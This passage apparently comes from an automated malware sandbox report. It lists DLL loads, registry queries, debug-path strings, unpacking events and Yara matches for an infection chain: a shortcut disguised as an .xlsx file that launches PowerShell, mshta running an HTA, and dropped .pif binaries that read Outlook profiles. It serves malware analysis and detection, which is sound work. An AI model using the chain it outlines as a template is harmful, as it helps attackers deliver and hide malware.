                    Source: C:\Windows\System32\svchost.exe    Section loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: msasn1.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: dpapi.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: mpr.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll (2 consecutive identical entries)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll (2 consecutive identical entries)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: schannel.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ntasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: edputil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wintypes.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: appresolver.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: bcp47langs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: slc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: sppc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: url.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: ieframe.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: wkscli.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: amsi.dll (7 consecutive identical entries)
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: endpointdlp.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: eamsi.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: amsi.dll (5 consecutive identical entries)
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: smartscreenps.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: amsi.dll (34 consecutive identical entries)
                    Source: C:\Users\user\AppData\Roaming\uc.exe    Section loaded: am.dll (47 consecutive identical entries)
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: am.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
                    Source: FT. 40FE CNY .xlsx.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Binary string: calc.pdbGCTL source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852558870.000001A2C46E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852439079.000001A2C46DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851615477.000001A2C4722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865516494.000001A2C46F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852507533.000001A2C4710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852261324.000001A2C46D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852234112.000001A2C438F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
                    Source: Binary string: PSReadline.pdbaK source: powershell.exe, 00000011.00000002.1635136687.0000029E326E4000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E323A0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
                    Source: Binary string: _.pdb source: bwsiuvcU.pif, 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: calc.pdb source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
                    Source: Binary string: easinvoker.pdbH source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
                    Source: Binary string: owershell.PSReadline.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E32432000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifUnpacked PE file: 23.2.bwsiuvcU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifUnpacked PE file: 25.2.bwsiuvcU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifUnpacked PE file: 27.2.bwsiuvcU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifUnpacked PE file: 23.2.bwsiuvcU.pif.400000.0.unpack
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifUnpacked PE file: 25.2.bwsiuvcU.pif.400000.0.unpack
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifUnpacked PE file: 27.2.bwsiuvcU.pif.400000.0.unpack
                    Source: Yara matchFile source: 19.2.uc.exe.2980000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001A.00000002.1728089924.0000000002831000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1499010628.0000000002385000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000003.1438376010.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
